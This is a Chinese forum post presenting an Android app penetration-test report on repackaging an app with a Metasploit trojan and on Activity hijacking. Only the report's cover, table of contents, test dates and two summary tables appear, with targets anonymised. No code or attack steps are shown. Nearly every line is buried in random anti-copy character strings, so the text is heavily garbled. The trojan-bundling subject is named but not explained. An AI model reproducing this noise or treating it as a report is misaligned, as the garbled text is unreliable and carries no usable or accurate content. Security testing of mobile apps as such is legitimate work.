找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 4365|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
& a; H. p% P; q - S. b6 x$ w" S3 [

" I9 B/ k; V ^# M9 f; ?8 B ; J' X, {6 D& P* S* a" P0 B
; G- C% n5 @ A' Q9 m; M) O " g! \" T3 Z+ T( T, c

& F/ K- J$ m2 X. v9 z : R5 m1 v+ }6 O0 d
2 I! d, H* E- V1 e* q) v 5 K5 D3 [/ J$ H$ P

$ l( j# ^; \2 g- _$ w ; [' I7 _1 J4 [0 f0 Z& ]4 Y 文档编号:                9 y$ H% f6 K7 D' Y$ @" Q" A4 Z9 _+ n 0 {! |8 C$ b9 Z$ c

* i! g+ @' B5 u8 E+ g; f5 P2 k( w% @. M( e% W! E1 J' T

p* D z7 {+ ^( Y2 w ' j9 r: e; _# J5 Q$ r% O0 j   U S K L7 @$ @' u- u! W ?( t* ^' M) p7 o3 X# s

# d8 m- P7 c/ v: r; Q0 z : k3 [- f5 c! M. Z, B

1 A. [) j4 V1 H) A& j ' L4 r ]6 U$ t$ E4 C( J8 W; Q9 {   - L' k: W2 v& T! ~& h, {, x5 ^9 p- {

W! ^/ v, T6 p1 K1 B ) Q8 K$ S) l: _

8 S( G* j) ?0 _3 r- j! v9 s3 W ; C% H, V% c4 E& C1 J8 T p   & l7 }' X+ [0 ?# Q' r: E+ D1 C % b: O/ k3 u$ k) Y, g' ? Z9 Y

4 A( b. \7 |" A/ V: V! I& L! l+ U `0 s

+ N: L- p/ o p2 r2 d6 W# |9 z1 ] " Q; M" T4 E1 l+ B$ y- I3 H1 P   ) ~- h6 h9 W U/ k # b" p" h7 S% U- v8 S! W: [

3 `# ^, _" d1 Y" m7 I2 P% o& i0 e" l& U

9 |& j. ], u1 \% f& A5 p* f$ o# S, l; F   3 m( B! f1 X+ k2 ]& c+ [4 k( H # t' c& w0 Z6 v) o- ~) a

# {8 [) Q$ D4 j: X! n " l, K( y; }8 z* l. W

2 Y9 d. \& m) m! n1 M! M3 d5 c i' h( V7 M% k% }( l2 m 某某某APP渗透测试 5 ^: y! b. M' I" x9 t; }* s5 k# F* A# N8 D

; N) F- v: J7 `6 [' m! e- i @- d5 N. k" T1 f+ Y7 D! t% j4 |% n

9 D$ l9 O" B' s. U* A* o4 ]3 w9 I9 A: c1 z$ j/ R   8 E7 f) T: f6 u/ d. [; X% l! c# \! m$ ? , D9 Q. ^$ L. g) X% X# y

6 Q/ O0 D; F8 ]5 Y! v 6 E9 q7 u& |. Z2 n: w( t

4 S) W, m, X$ x& J+ Z ; e+ i C% P# c   # b1 z( J/ ^9 h) k# _8 P% b5 ]+ m# M2 o3 V

0 g$ ?- U* O, j+ N) W# L! ] ; u: d& }3 b. u! R/ c

0 @) {. Z1 o" L z6 {0 s' U ( @' c0 F. D3 @3 w   - R9 O# Y* T5 {9 v, N6 V5 ? ; w% G# a) E3 l

' D) H4 Y6 Z) H1 f7 Q' [ 2 B# h0 l' l9 b$ R4 h/ `/ D

! S1 s7 _/ W2 Z6 r : ^. g: s! E# W, h1 ]" a   : ~% O3 N' p, O: e# J 6 I& m3 R. m8 M9 o/ h, Q

$ @% P: B8 `# k& t 2 |9 p" D. X# Q; H5 R

% y( t0 [' T! }! |0 ^3 L 4 |& t% A3 U/ W. J: V Q0 ^* U0 R 技 术 报 告 ) G3 `7 h, A8 P2 H : X/ H; f5 Z3 j

# m- O. K% d; J . g H d& Q$ K! e

5 N* h. F0 S( b. Q# L0 |; f; z3 ` `& S4 X- e) P   9 d+ f4 z2 k# i9 ]8 @# N T% ^" h

, k5 E i4 Q& ?1 c7 k , q) T% m1 X$ ~/ @5 ^4 q

, @* c! I" a2 f& L: B, A% `5 p( [% w; L* x0 t: `1 K# u" ~( N: L   ; |3 B S$ f+ t+ S9 A9 f0 r9 F, _* \, ^) W

p6 O: J0 B' A6 P& k4 N' Y $ B; ~9 X0 z: ?# N# r- R

M! | z$ p9 A9 F ' O9 m& I: D/ K" ^   6 h+ d4 r: T e) ^0 B : u0 e5 y/ W9 Z1 Y9 W b+ N

( _8 U2 k5 j2 a2 b" p+ g5 h# O1 Z! S& G

1 T6 V9 I" {% [6 n2 I) s5 b/ B' c & q& G3 a' q6 m1 i; ^7 g1 A9 t. G3 _3 F   ; u9 F1 W/ `& L& Y" z' K; T$ s. L' N8 F7 A, o3 x

/ m, |/ Y4 l9 k, }$ n/ P & a- J f' ?8 T& H6 k

1 k% w4 ?) N [' S; O " G$ U% y( M6 }   6 X5 Q" u( I" T9 v + D# i! ~" P/ n2 V+ D: M

: ~( o+ T! N# `& ~' q. u) m$ A/ B1 r7 ^+ w* V# ?

; L1 X" i- c. x& \% O! u $ U, N8 z0 ]0 x) D. A4 J   : X1 d# g" Q& @2 {8 V1 Q8 t' u0 x: B' ^. E5 V

$ K! _, W6 h/ @$ E' Q0 h# D& M; p% `5 s' B2 v5 [& J

* O$ n* T2 H' P+ R K( I, d. b7 S% ~   6 e7 T$ Q: L6 u; c, L" g+ a* Q: g1 u9 W- A8 _2 g

" y0 |& C- f, f/ c1 Q9 N2 W; b) u" t6 M9 W. C8 g/ ~

3 \ E! L& S" ~- y9 Y/ B3 m3 L! S- o6 }! \7 H% c# |: i* @) d   5 w& k/ W" f B% ~1 F2 K( Q$ O- w( S3 y

5 E: J! A* D0 T8 O, p% r 4 E7 P% ^% |/ O1 ^* ^, \

4 z6 k5 ], I8 w+ W8 `( Y & M* X) @% D0 v# x; [5 s# ?+ A   ( ^# G# c0 u- ?! ]: z/ N3 M9 j- O, c- {; @" d( a

1 }, T: A/ g9 y" p7 C + d8 \$ U, r& E" P

' C3 y' v6 L9 m' Y4 L1 \0 y2 J7 p z$ p% L3 [   p4 H0 L! [' \$ @4 J" q( m/ t, X5 G5 v4 G4 y' D! y

1 z& v% m' q q/ q) C3 v k , x; a7 x' O( H, ~" M8 h1 N

+ d- q4 Z2 P, {/ t1 t4 i8 E$ q8 z6 c6 \6 @6 k( \   $ n+ ]" F! g+ I8 i8 x 2 \+ r4 ^6 [7 I8 N: L) _

' @, }! I$ B* [/ Y |5 d% ~! J2 D7 O 4 }7 t% X" c0 m9 l

" d2 M6 k- U6 p& [: S 3 C+ `0 a: b5 \2 ~. O8 j: b8 t   ( N; q6 B- k1 ^! v! |3 N' H$ `+ E6 v% n: ^3 n" M, x7 S) N) C

: R. E8 w3 F) v* K/ K6 V : n: m7 A+ q# L3 ^5 E3 M) M9 L3 Q8 d9 Y

4 D' Z6 i% @2 t1 n ; j- ~6 j" k6 j$ j+ ~( p0 d   2 J- P- s& t/ H( B 1 b* e* |: E% g- c2 ?

- c8 X( q) \9 F- q. P- Z5 ]; x* J: U8 s" `& y

' M! T" f- e* y1 h, {7 m4 N7 X5 p& ]" t$ q: ^+ h+ t+ t1 r4 h   " n( j- p9 x* c1 ? 3 X& R) g* Q7 v% t2 W; R

- @- Y k7 U' j1 Q4 ` - B: H- N/ v& @* C- x4 u% }

5 v9 A+ A* s8 u; ^ 3 W9 S8 y( y2 h   3 y7 n( V3 O0 B; N" f , | C* R" z9 o5 ]# p3 K: i4 y# w

, r+ O! W) C8 \9 V V6 a * p- u+ n" e% ~3 _* H

* H8 B; r2 a" ]& i. J 6 A5 _/ B& r" @+ p ?9 I   6 A3 F: J6 A8 R; p ( l8 W; D; s/ [, f

& g& @; R$ H! |( T$ R3 ~8 d* ` 0 Y; t# i9 T; O* `3 l2 u" N0 K; v

" L p/ @$ F, _& ]- q2 Y+ F. e S) U1 t) j- H2 Z   w3 U a; {/ R7 x - V9 N/ _7 h: k5 C- D

1 T# J8 X& P+ C. Y1 ] + ]# A& v; a7 \

! [3 D' q0 f% ]6 V8 U . M; ?5 V" ~2 V0 w# t% p   1 }& d0 G4 l b- \( U5 {6 n . Y4 ~& ^, l, ^" v% t

. d7 y' V5 `) d5 h# f5 p: m; t z# w8 _( L+ D, D, k. S) `

0 T: s$ t6 C! e, T) s & T/ b0 @7 G; h9 ~$ h4 H! Q2 d 二〇二〇年 4 n+ c; x- {/ ?3 e* c- k" g z / E# ?- G& A6 o) s* d

4 Z5 T- S# M' J: i" } 6 ~) ^2 o) A3 {
$ x$ P a4 f9 k9 i& q ; u0 }' i# M/ S& n" |( \( J
7 h3 P% Z; a& W/ e' G , Y4 D5 }: R: e6 A7 G% w; v 4 C6 o# k/ J8 \9 M! N. f. G " D1 z; h y5 e
. H8 ]# Z# Q0 f% i- {0 p1 n ) M/ h# J" z2 G' d" n$ c
: I! M6 n% ?+ P& W0 t. k 6 P) K$ B. j* i
+ R. u% ?- E5 Q# i+ h' Z; @' Z. X7 ^1 Z! G# K& H* ~1 |+ C " }- e5 |4 V* N! ` / U* U4 F- v3 t7 s* c
* k6 }+ T+ v- N2 ^1 D7 U1 r 7 n5 \5 I& a+ Z; i! Z( V

8 ~6 h! o5 ~. Q$ U, @ % [. a( {/ m7 n5 }+ h 目 录 ' I3 q# M( o4 E8 h0 N* y! y- A; f5 s# G _

) }2 g8 ?# T1 m, Z& e* _! S& |0 |! y$ }+ x4 L' V- o/ e & J/ k6 M% y) s1 S l# n, x8 W ) ?! Y5 z; X' e& a! n

6 \ m2 e! L# R0 M4 A( V4 f) g5 Z8 K) h5 P, O   3 b9 z' `( j! S% Z0 e ; V+ s. D+ R( A$ f5 j0 j

: K0 Y! \1 k' s8 K. F 4 v6 x( L1 t5 k& S0 b! r+ o

, O( J8 C' t) Y : {( L- c' {) j0 r; f6 M3 M, V 1 概述... 3 + n- e z# n- E7 |* X: [$ ]; x$ ?# S) f# C/ G8 n

9 m9 ~8 ~7 I6 u! N. f% B / d5 \/ d' v, q% \% S6 z/ h B p

( f9 p( k- P( X3 B! p$ E' F3 B9 U + k7 k3 a( q# g) M5 k0 j+ t9 R 1.2测试时间... 3 0 g- ?! q$ w* D# r( A3 q1 m; y : x! A. M r5 {% M+ ]

' e+ H* I2 S5 m; s8 e0 Q: h7 M& S" e% X- T

7 i+ }& G, D6 l- z- s$ J " J$ D5 D' I$ m6 G! b& d 1.3测试对象... 3 5 {4 M4 _# o# _$ R5 i/ V7 |" \ 8 U. v. B" I# h# F1 F, g" F

$ ~1 }6 W8 v2 o7 w5 ^ / w {' p* r% L: W/ \

8 I: W0 S( F2 p6 [2 X0 t t0 l" F6 d' {: s8 s 1.4测试结果... 3 ; @: u, t; ~6 H- `/ g3 x$ c3 W! { ; ^- L) t& k3 J2 ~0 K, N0 d; A2 E

$ Y( U0 Q; S# O% c! N/ }3 ?! O $ b' g0 \8 A! \' f

4 p8 ], q4 A ~2 o. ^2 k8 n% F6 s# s1 Z: @& g/ P3 i. ?( B4 ? 2 检测结果... 4 2 P9 M* D* V9 V0 O+ R* R% d, T6 v 5 r" |) X1 y: m5 Q

/ j2 G6 }) Q4 Y: l* n . }" @9 a4 \: G& W- u

9 N9 W6 o- l* S5 p6 d4 W4 `& _+ _+ Q0 ]3 Q: e' p) e4 |* f1 a, b; O 2.1 某某某... 4 : `8 q: @( O+ b0 Y, t. s3 _, v7 e* `8 F! P# i

& p2 v3 V/ H1 q# w ' a6 B! o* w, K6 ^8 F: j

: M: F* n2 ?, k! D% l0 v" ]8 | % ?$ `1 J( w) X4 g 2.1.1检测目标... 4 1 F) @$ l+ h. y# g9 A % K6 p( B# e S

( [8 I- R# L: J$ ]6 M" n5 S: S. q+ I# t+ w* e& j

: {) H& {/ [7 V+ F$ U4 A5 ^2 j. L+ {7 \* F$ W0 z" d E 2.1.2检测结果... 4 3 [1 z& d3 T% a% c$ I% q" R6 } 8 o: A$ n2 ?# C4 i

$ R8 w) R5 S4 I. o8 s 7 m5 j4 w1 B# n# b" L4 v& Y

( e/ t; C* V* Z: g9 L% l: s/ _# G . R% H' V) a8 i9 B 2.1.2.1. 4 / o# z0 W: f& W2 a) c! d 7 u9 m. D! J# l ?9 T% [! Y

7 F! O. U% j* k% T/ A& y6 D8 e6 T$ X0 Y$ X* w( d' t

+ Q+ D9 F2 F0 x4 J. g* k 7 [/ G9 a7 B: A" ?' t+ G& ~ 2.1.2.2. 6 5 |; o* E! w i3 @8 M- x5 j2 t 1 F1 K6 ^5 L+ I; l9 h

" P( }/ k- s4 I ) h5 Y( W$ T6 I' ^3 s! b

# W6 k, J$ L/ @( i# q6 z) P- B7 A9 h. ?! }* Y( K3 n( @& i% K ; I3 A5 ^8 M! h' G8 _' z+ x . M! q, V' ?# p; x- L. ]! j5 n

0 Q* B6 x2 _+ X! Y ! z8 O# P2 S5 j! n 5 Z) ?7 R- F* v/ s- I- e. l- e 7 Z2 s2 y, f: A/ d! K' G! I
0 z. p' v7 {1 V* q- y , J& t9 }/ {& j5 P3 `7 K
i6 t$ R. x2 s0 M% r - E4 V! r/ V. ~: j* p* e7 m! Q + Y# W1 E1 ~' }7 S3 { * I( b. x9 E7 G7 i) Z/ [5 {+ K

3 V! n9 R0 f# ` 3 i" H. Q1 d I& I) [ 1 概述 ; r5 o: d9 c" b0 y$ b; {; Z: V* | [7 ^7 R+ V, i: j

3 N1 d) i6 j F/ x1 S% u A 5 O( u0 @) W0 c# \

3 L' A% O; f K7 }2 _) \8 U# P6 V8 b7 e1 {5 S5 ]. Y 1.2测试时间 ! j8 r7 J. G1 }. q1 d 9 N5 \3 \" Q- V( T$ s

8 G! ?+ O1 @' w, f" X 2 N R& B. I; T4 }9 m , G! q, a! x) ? a: w% `* J$ U- y$ }% }0 w* v& I6 P6 z8 r. v7 G0 h9 I) v0 q) ^! p6 P( w- Z f: l! N( e$ O2 Y/ g! B0 T( \# e5 q, a9 `$ m- o# ?6 {1 H% b9 I3 F) c O; Q2 v3 `2 G7 V0 R \8 }4 a" C! ^9 k3 a9 I- F0 J9 a' G$ @8 L# j0 T U5 [* j# O- {; V4 A( W% M, t8 I. |$ B9 r. t$ m) g9 B% v0 ^0 N$ u2 c2 f1 o: g" N) [7 ]1 v% O7 C! j* ]3 V5 B( b, `4 _. n: w5 F$ a9 b9 m/ h6 t! k: p n7 I3 p" W: A4 d, @0 p7 X+ c+ {. B% x1 L# m7 j$ E; `9 {$ Q: O/ x! @- ^! R% {3 v* V+ n' o. C9 T" W& b: y5 i- ~, g' v$ |) _' a3 d5 ~ g: W( S8 f" N# o+ k3 V8 P; W1 r$ U+ s) s% U- h" h% A' ^. Q2 a- `5 S, e y' x! k- H( r8 H, I1 F) B5 t& m2 u/ I) |& r1 g! }" L4 N, k( @: U/ u' c' L
% @/ w8 @. a+ M* v6 k5 r9 j2 r" Q& d

" }; y8 c5 N+ S6 R6 D5 a: Q$ f 6 h: v/ S, F6 \# Q6 W* q 渗透测试时间 & m! f6 I5 i0 K5 O6 \ o% m . G. u+ v5 j* ]+ D+ }) f

" i: q' n9 N6 k" T# {% Y6 |' | ( t, v W0 y& B1 j5 H, V
% b9 f% T7 ~$ T J; @, e ! N' F( r! t( b2 y4 X) w

1 U, ~9 m& f' t R/ a0 x & T X3 \+ t2 E5 }3 j 起始时间 ! W; P0 w! p' u3 j" n( B z0 ?. { . F4 f1 `5 E. J4 {4 Y, s$ ^

s( k: B8 T1 W* a5 D) @. n7 a% a9 ]# G0 `3 P 		' r. u- U8 C8 j9 ^; h ( k4 X, N3 H7 |0 ^- O" T& g8 ^

4 l9 M+ W; M2 h* [, F+ K ) g, S. ^3 a" ~: Q8 ^# l4 f- x/ e 202046 3 z. B. `: `3 A* h 2 I6 ?) ~- C# d( [4 A

1 W: e5 P! O& B: J0 `3 v7 [/ ^ , }- | ?! L% ?6 B, g: H: b/ |
5 D6 U, ]" ~% W7 ~6 ~+ H" f9 ~5 i$ v. t

% g! y3 a5 u& ^' ~" A1 K. m( G' H ! ?1 A( \: @1 N) h$ c: \3 \ 结束时间 + r2 M% E2 K7 M6 c6 S # Y" D; X8 F% N# q& q0 I% F

! x$ l; ]/ o* L' S) ?( V+ d / r$ I% K6 s3 l! y( q: x+ D 		' n1 E: @' G, c$ k7 D, ]* C/ N% W$ [! ?& N5 }

9 E$ R- t0 Q% f& M) i9 b2 f d2 z- z! P& Q9 r! s 202049 / V8 u9 y/ P7 F. h5 @4 F6 N6 t) |1 W2 m' A9 x4 o8 o9 J! H: p

6 T- S# Y8 z* t4 G! u+ |- p 5 r9 [# b) j" p- t; Q
: i6 c4 n3 }( @ M: Z 0 B2 z1 q# N- O; h- W. i' F& j

5 {/ }+ D" a- G' { 6 b& i( c3 E- o! C 1.3测试对象 6 [+ b8 y$ \* v2 ] \; x, B) i1 `8 }7 }& J: W" u

" j' { f" d3 m . c' r' A$ E3 o- O$ r) f6 z- e

! [# w8 R+ m7 J' m L" D; y l. b' u 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: ' ~1 o# T4 o" X" P ! [8 R/ k& p1 R) s* }! y5 Q

9 J4 b) V& m% O9 s / u) ]/ E" ]* {% u' ], u

0 m( `% j% T' o' |! b6 T% @) `/ T# r D* ^ 1-1 检测对象 1 j$ U+ M9 h: k) Z! o # Z' D/ e6 m8 s5 z% ?" b9 O; t. x

. D: `1 V$ q' e. x# ^( i2 l8 \ ( h7 n( B7 _5 u8 M! V6 D 6 G" O8 q6 W( `+ Q! }2 s! [6 U9 J4 T/ }# g! s: ]* n# p% P1 q' m9 N8 E( `3 m$ }3 X0 x# j' J2 S+ `* _- |; S# q& m% Y& h, P$ M" a z; t* n, x9 K5 s5 S9 t2 L& ~3 R- b4 o% R' n* Q' e: R4 ]$ v0 d" u6 M5 g: b2 F. s+ O m4 ^/ _! E; R5 N( q$ @0 @+ D+ n* I) B5 Q' o3 R" l m" _" ^4 h% g6 z0 G& f: E) L4 j4 L0 ^4 ?, A Y# M" a% M- e/ H4 z' X5 J* l% E# M9 x, U- H/ a* u1 z& x) Y. t6 w0 K% q! v2 c% z9 ]- }( D/ t6 C& C7 v/ c, K6 Z* o7 p$ u. |2 |, ? c! @5 m6 |( d( s: C/ z1 R* a1 @% M* `4 K( y7 w0 {- ~0 h' Q8 ~5 `( W4 x( w# Q- Q, k6 m% X- i5 H) d- F) @9 z+ O! i, W4 D) E8 v5 {3 m- A# i. s8 z; y7 u' A, {0 Z% g$ v) r6 q# x5 t# `4 W( }! Y& u4 M7 l# V% D4 T2 m, D/ z: i8 p" c3 n; O& ]/ [; C% e" f5 ]& N# {9 I( R$ U# ]% b& T- f
( z* {7 ?2 \# K% @1 T ) i! [! W, g, b; E) f1 s

4 H$ X( { i, w% {6 L* L+ L0 _! ^% M) ?' C' C) \2 l4 }, S 序号 ! j. s% n% r6 l+ W % c6 e5 R2 t$ k- |1 E

" N, Z. g: N( J k+ }0 K8 ~% |' H0 k6 |! v7 w% }# y 		9 `$ B/ T; L4 s: C) G 1 u+ r: |. ]* {" B+ v( I

: }$ M. `& o% z' j 4 z, E1 ]/ E; Y8 N+ i6 L 测试对象 & p2 W$ U/ i1 E# l % \6 n% O& x9 A$ ?' d m

" e% Z; A! w/ {0 W) E5 s , P/ p& B% X; q: T" r/ b5 n 		7 w1 E0 K" w0 n+ l+ {, D/ D 1 W0 p! W2 v) }1 m/ K

+ Z! a0 C$ V2 R) G 2 A+ t( z1 `# N 测试地址 1 L$ l; O" J c$ h) I8 D2 I! l4 t* G% H/ |) u- r' b# I$ o

4 m! x3 ?- t+ a* A7 v5 B $ } ?4 V+ g/ i+ ]* T 		) j2 x! y5 X! p" W- B4 @0 t8 s7 R 8 W7 k, U+ g$ P

2 H$ T1 o( o. d2 t# J4 ]! r $ j4 ]/ T, n0 S$ P4 U# h- ~0 a" u 安全漏洞 ^6 `0 b$ z! b: o2 j7 d ( r! `( z9 P; [% m

! c3 g- t. v: h% S# a0 z+ B0 Z2 s8 Q: H: V
' r* d4 U1 g2 i; o6 ]% S 8 a2 Z* }- i( A9 c

1 H6 m$ O1 g" T" E' P8 C6 C' z 4 Z1 ?6 n* W8 ?1 f1 q, c 1 1 p3 G7 F. H2 e A " ]3 \+ Y4 x4 n2 W' {& t4 S: A2 O

5 r3 G3 G8 E7 d' v7 m 5 G* a: g% z! H% B1 a 		& ?# C0 F3 [0 ]4 f3 |; W0 h* x* B0 q% o- c

) y, r% d& m! B( Q" n& o ! |6 E/ n) @6 c" h3 B+ ?3 e 某某某安卓APP 2 n0 N/ U- e) {/ \8 G5 q; G2 x; K5 E/ B. U3 C$ a. s6 w9 x

0 E B) q4 i8 Q! r" r% u; q* o; G 		& f @8 i0 n, m* ]9 h, p( } 4 w, e {. {, P8 I' ?

5 b, ]6 `' x" m5 q1 B * p: G$ O( m' r$ R. x   & ~4 T |, E* h$ a! {# K4 x1 k7 [ ; C# I3 v6 g1 M

& T) @ V% p x! H+ z8 m! c" w4 J 		# F2 |8 ~0 X Z) E3 X* Z$ E 1 Q9 i& j' |# |: W- \8 Q

* c) L- e' f* ~( }+ w* H& R9 f6 Q' d8 Z 2 # B% p5 X8 E) N9 Q 5 M/ j( q' @: g0 ]. ?9 F

. `. L* t; s t% Y% V6 N % o6 V0 Q# b8 l" R; |, q* {
( k, {" [! u- N+ r+ B# x% D & M( y, {: ~3 q

7 Y, H3 U2 ^9 m% y* |/ l! T% }; t. d- s0 R 1.4测试结果 " P% f: K4 D4 H8 \9 R8 V + J% X0 g4 S& k, s% l* l

8 X e% L+ K* I& k 4 S2 y8 F8 {1 U( u/ V$ E3 }! f

9 b% g3 M6 p8 i L! D i: R ) `: Q8 t. S; y! p, `2 W4 V 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: - P4 z( j% w( ?% ? - Z& `; n* ~) b1 x: w5 [; A- V& z

( {, W7 X, e |* N m* ] ! e5 h5 E7 }4 g; ~9 t

1 l. |5 k& d, h& I2 V) ]! I! x# E8 y- @1 M: d+ O- I( u+ ]. ?! T+ [   , ~" O: O8 r* Z! O' b ' t5 _) Z- S* k1 n( R& }# N# a1 w2 c3 ^

5 b1 T4 s, ^& v8 H; d- r4 h5 r6 P1 a( k5 `) R* a. S# ^0 j
( n! j' j1 b Q+ V * I2 ^3 \* j. H7 A1 |1 b$ D+ r ' c8 R' i& W, S4 F% Y& U; C) P9 e1 X# c7 F. O- \; C4 z8 A% c* ?9 z9 I5 H8 r- {4 f$ Y! f2 a6 `, K8 ?0 e( S% g o- Y f& ~! i6 r+ U! P/ l' @; w; V( {5 Z Y' p8 g( v) u- n* ?0 S$ T/ }- M; `! L3 Z/ e# a3 H: s! X3 e7 ?0 K3 g- p7 k3 ^$ ]2 c: V7 X2 H, o5 s( c+ h2 [( W& {7 d# x- I: ?. c7 f. x3 m, v; j+ N; z& |6 }1 N6 N" }8 `1 m. q1 w# ^9 _5 Q. k8 ^( X/ g! p: W k5 ^3 V, n0 W, n9 `. a0 x) V& Y! L% u: ?& F* ?6 V, F% |; Y/ j: r5 a @$ Q$ B8 O. [7 {# z( n" z% M% u1 z6 x7 l9 p1 q) u' M$ g+ F- D: l( l( [9 Y4 O, D* |; A$ C: l5 t' L2 W& l; B6 Z8 R4 u3 h& S) D$ M+ I. g7 C9 k7 m; O# J+ L1 g* |% p9 E6 N, X" |1 s8 n/ G: G6 P1 N; w9 W1 W( i5 H1 @. D [0 p3 Z2 n5 o- }) \% e" G7 r! A5 f# v- p' w) q8 _5 b3 V. X E) E" e' g" L; F) s9 M& @# J2 a: d* B- j! T# v) [$ [* P) }3 v9 G6 F9 R: g/ U( Y$ T z: Z! O8 \% t B/ Y' t3 c! `6 u u6 v7 g) k. W2 N: ]; D7 U; ^$ S Q! B3 d+ i6 H" f; F. t$ p7 j% I+ F8 P. c9 K8 F- b3 ~7 y# V7 r3 A+ w' P3 E; G4 v( f; ~9 C" ~2 q7 O# \5 t% Y* p( ~- z- f5 i6 c6 ~1 Y( F+ U3 Z5 N$ Q) @+ z$ R# ~7 N# v. a# o% Z% X# G' V! j6 t" T- H8 N3 r6 L- W6 s4 ?' p& T9 j. D& h1 I/ D, E1 f7 a8 o# q3 Q+ e9 p% j& f% G; e6 f& s1 m1 N! t" L! M1 \* R7 g; t8 ^# s3 z) \/ B" c/ O4 y! N1 I
' v( H( |7 U2 Q 4 w5 U% s4 R, Q3 n

* N6 ]1 h8 o2 C" T/ `0 }% N 2 {, p0 v* n; R) l+ d 序号 ) \' P0 t# P7 \0 f! D' o' Y& ~# Q; g$ K) f

; H" b8 x3 i1 m T) X- h 7 G) ?& ?# p) T) {5 o! j7 V 		. c1 a9 w$ b1 `' n; o% _ 0 ]) p6 u; \, L4 a. w

# x2 a2 e, O! ?. n4 A + x. B5 w$ M+ F 系统名称 3 B; } J- I6 _8 S9 c * ^) y8 l7 r3 t( Y; j9 g) Q* h

: O# [8 v0 t# t+ M' [2 @ # y- i7 ?; s( C, Q9 [ 		W# o4 d- b1 j* c6 q* F- m) } & W1 R# ^* a2 @* t2 Q! c% v7 F4 U0 a

8 ?( J0 n/ r* C( n T4 U & d2 H& x- r! f E5 B 漏洞名称 , ^7 p o& ?* `. V" m + L7 g2 b2 ^1 V. e+ Z9 ~: g: [

5 I# {. G! Q- X) Y- u+ S( v 0 Q* w! E% _7 w( c/ ^ 		- a( b+ E$ U4 U0 }3 {: [* y- q0 e " z+ v4 G7 {" G7 J E& r+ O/ R: t5 j

9 P2 h- K$ Y& q5 G; v, y & i/ Y! f' b. W& Q ~; l 漏洞危害 + ?3 v# c8 l% C) A 4 G3 @. M- c, o8 a) c

2 A$ W* ^8 I' `2 s" j8 i7 C: ?# F" K3 D F. W6 h& Z8 f* C1 J$ v 		' [5 u( `' H7 M8 D) }- c" z$ }7 x6 r8 c

; |8 A# u0 w- A : X6 W" s5 D: E! m: H. A, r3 T# F' H 修复结果 ) r3 R- J2 c1 Y: t # U4 M7 l W: x' p+ K& f: H: e

) g: s& Z( o/ N& e0 U& W, u$ c" S( ^: L4 e n3 L( ^! m( r( m
) K6 m) d; v, Z0 z" V : T6 @: U) _8 p; b3 w

% j$ g: C( C& c! y% k % c6 s( X2 a5 A- g 1 0 }% a+ f) C8 z, [% ^9 i 7 e; l5 a0 i }. E, K

7 T4 h7 g& m/ v 1 \, J9 c0 Z) ~! q 		: e% H4 \) J; B3 i0 l: J 9 W4 d9 N0 u4 L

& z/ C: @0 c# m, W5 i* j$ }$ W" O, ^7 p) {1 C T 某某某某某某APP 2 k8 Q, T( S) q5 F/ X! E$ x( [! K# u( ^$ {+ ?3 h% L* q

6 r- f' i6 Y5 }: j7 g( k# h* m) H0 u( }0 \- j 		# m: x/ G2 f; V! a5 x0 _- `4 {) g L ! }: b- r' |1 ^9 ?

- |" c) _. Y& G) N9 V- g7 t- ?9 d& y Activity 劫持 9 i" w1 Z* Y+ `; p& r2 C* j4 e/ r0 U& F8 S

) e/ ~! X; F0 x ' g, w. h# t7 X) b: D' J8 ^

" l! K# N! Y8 e# ]$ E5 d* E6 E2 B/ @# V7 q: V9 e   7 k0 H5 Q! A/ M# ^# p) N5 b $ r* ^% Y4 K- z# F

* R. u+ ~' ~/ \% @1 _ 2 @0 W1 i9 s( s+ F# { 		# Q/ h5 B+ R {# q % P( v: J% W3 \/ y) F7 H0 B" t

+ x5 ~% c& K1 ^; P, o/ @' J/ j& a5 L4 V 2 I% d7 P/ [- l4 K# D $ ?& l8 e" K9 N; W ) b% V2 a, i* X6 F) b- X

- i" E: Q7 e( R5 \ / j2 \4 Q; V& n) d- L6 n 		2 g* i3 Y- F. I8 z8 \) D " `7 U2 V' L: k: [# ~# q5 W# p" t( B; l

9 q f9 u: i1 f9 J* J5 q & z4 e+ l7 w2 G   & \% S4 w! I1 d, D4 c5 f1 O& G' n0 ]) X8 d& g+ b* S

9 h$ m/ v$ z$ Q! u1 I' \ ?8 q/ x8 t8 t, x2 ^
* o6 n, P5 Q; ?$ s* v6 Z 9 K8 S8 s" z3 f+ z4 S9 l

# B9 m& X2 H" Y% i' u# J5 Z . X( C+ t4 A- G# Q2 ] 2 5 ]0 \' ~: _7 l2 \8 ]4 F8 {' \2 ?4 a

9 ^* q* ~( B# S" } 8 X4 |4 ]. X$ q' T: c 		1 ~ } v& \1 ^% a# J; W. Z& K: p9 F' p7 @; U

" Y8 T2 y/ `! T& m : |8 g6 s% s( u; h 某某某某某某APP # _8 a( y! p: J9 J7 f$ s % z6 k1 J7 B, B. ~, c8 {* \

( B4 D) N. ^; _; z# d, o$ l 8 N& e% r6 A0 Y1 X 		$ r* b8 N5 p7 E: p9 [# _8 q o 1 E5 I6 S, x# l/ N) H$ ^' u

: c- ]0 X2 r% f5 M2 U6 {( c9 ?, x7 B / \0 S3 n( e/ v$ I, R 反编译二次打包捆绑木马、篡改APP代码 . R- {- F* }, c( T0 ?: F S5 _ # q; n5 t( y5 J1 B) z

' G! z& Y" x. X/ Y2 x* m6 P9 Z - z6 h1 l$ `4 D- Q# C6 d& n% R! s 		4 d# H& a0 V' B ! v% t2 P6 j1 A; T5 V

# C6 D/ C% R% C+ j* Y- @9 m7 e 3 h0 X8 y# ~1 E% d7 {% t7 { % K% n0 c$ R: t! s" A3 O4 y5 V ' c7 B( G$ q9 w& [' _% y- y

2 t0 F) A4 A! d1 _, y! @7 Z$ S c, g 		6 W* }6 g# D$ f$ x$ _4 o3 { 8 G! q- m6 b; H% I; N: G0 A* G

7 c% ?; D1 a( W1 c7 U2 T w1 ^# {' D1 R) z1 D   4 t- N. p3 f: f0 w * y& \: w6 {% r8 w5 A6 H6 s

